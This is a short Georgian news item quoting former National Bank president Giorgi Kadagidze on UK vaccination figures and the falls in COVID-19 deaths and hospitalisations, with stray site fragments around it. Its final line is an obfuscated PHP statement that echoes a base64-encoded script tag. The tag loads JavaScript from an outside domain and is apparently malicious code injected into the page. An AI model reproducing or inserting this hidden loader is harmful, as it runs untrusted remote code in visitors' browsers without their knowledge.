celsiusi
ავერსი საქკაბელი
ოდნავ დაგვიანებული თუმცა აუცილებელი ინფორმაცია, თუ რა შედეგი მოიტანა ვაქცინამ ბრიტანეთში. ამის შესახებ ეროვნული ბანკის ყოფილი პრეზიდენტი გიორგი ქადაგიძე სოციალურ ქსელში წერს. 
 
“ეკონომისტის“ მონაცემებზე დაყრდნობით გიორგი ქადაგიძე წერს, რომ ბრიტანეთში აცრები 8 დეკემბერს დაიწყო, 24 იანვრისთვის 80 წელს გადაცილებული (2,4 მილიონი) მოსახლეობის 80%-ს გაუკეთდა ერთი აცრა მაინც, ხოლო 7 თებერვლისთვის 70-79 წლის მოსახლეობის (4,7 მილიონი) 83% იყო აცრილი. 
 
“შედეგად ჯამური სიკვდილიანობა 24 თებერვლისთვის უკვე შემცირდა 65%-ით. იგივე სტატისტიკაა შოტლანდიაში, სადაც იგივე პერიოდში აცრილი 1,1 მილიონი ადამიანიდან ჰოსპიტალიზაციის მაჩვენებელი შემცირდა 85-95% პროცენტით. თუ ვინმე რიცხვებთან არ მეგობრობს და გრაფიკულად აინტერესებს “უშველა თუ ვერ” თანდართულია გრაფიკი. პ.ს. ისრაელზე აღარ დავწერ, ის კიდევ უფრო უხერხულია”, - წერს ეროვნული ბანკის ყოფილი პრეზიდენტი.
 

 

1455
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");